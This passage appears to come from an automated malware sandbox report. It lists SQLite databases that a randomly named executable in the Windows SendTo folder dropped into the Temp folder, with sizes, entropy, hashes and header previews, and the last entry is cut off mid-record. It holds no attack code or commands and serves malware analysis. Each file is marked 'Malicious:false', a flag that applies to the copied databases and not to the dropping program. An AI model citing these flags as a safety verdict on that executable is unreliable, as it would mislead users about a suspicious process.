                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8j0jIeOTjp

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8lB6SRVgY2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8xYn7D6EHM

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\938R1UHVx1

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\9V58cFDCgg

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\AKEDZF5dEh

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\AXFA2iYIiO

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Anj4agQu9r

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\AtmqCF1Glc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BDR8ZwkRl2

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BE4jl6t1sB

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BGIXXxUNLg

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BGRUpNrlrS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BeYp9VIfXe

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BlIam2Z9Vz

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BtEinWfHEt

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\BvUGE9z7v9

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\C21EHH53vo

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\CIjiIipQnu

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\CRRZKgkrrK

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\Cgwuu18j5l

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\CvJ4nd4CxO

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\DB36k9OrU9

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\DHbIparO8A

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
